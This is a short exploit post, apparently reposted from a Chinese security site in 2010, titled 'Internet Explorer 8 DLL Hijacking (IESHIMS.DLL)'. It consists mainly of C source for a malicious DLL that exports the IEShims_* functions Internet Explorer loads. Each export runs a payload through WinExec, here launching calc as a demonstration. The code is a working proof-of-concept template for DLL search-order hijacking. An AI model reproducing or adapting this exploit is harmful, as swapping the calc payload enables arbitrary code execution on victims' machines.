Microsoft Internet explorer 8 DLL Hijacking (IESHIMS.DLL)
|
来源:vfocus.net 作者:MantyCore 发布时间:2010-08-30
|
|
Author: MantyCore Tested on: XP SP3
#include <windows.h> #define DLLIMPORT __declspec (dllexport)
DLLIMPORT void IEShims_GetOriginatingThreadId() { MantyCore(); } DLLIMPORT void IEShims_InDllMainContext() { MantyCore(); } DLLIMPORT void IEShims_Initialize() { MantyCore(); } DLLIMPORT void IEShims_SetRedirectRegistryForThread() { MantyCore(); } DLLIMPORT void IEShims_Uninitialize() { MantyCore(); }
int MantyCore() { WinExec("calc", 0); exit(0); return 0; }
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|